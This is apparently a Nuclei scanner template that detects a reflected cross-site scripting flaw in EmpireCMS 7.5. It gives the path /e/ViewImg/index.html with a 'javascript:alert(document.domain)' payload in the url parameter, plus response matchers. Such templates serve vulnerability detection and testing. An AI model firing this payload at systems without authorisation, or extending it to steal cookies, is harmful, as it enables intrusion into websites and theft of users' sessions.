id: empirecms-xss

info:
  name: EmpireCMS 7.5 - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: EmpireCMS 7.5 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://www.geek-share.com/detail/2777280260.html
    - https://github.com/leadscloud/EmpireCMS/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: empirecms,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'onmousewheel=\"return bbimg(this)\"'

      - type: status
        status:
          - 200

# digest: 4b0a004830460221008c6c6316e9049fba3eb3b61777a0da5a43b9d98ca3781ff694e342671427c0dc022100e90e7144d405eed50aa06619ddecd3f334994ff65c27b9bd32fddeef4e87db0e:922c64590222798bb761d5b6d8e72950
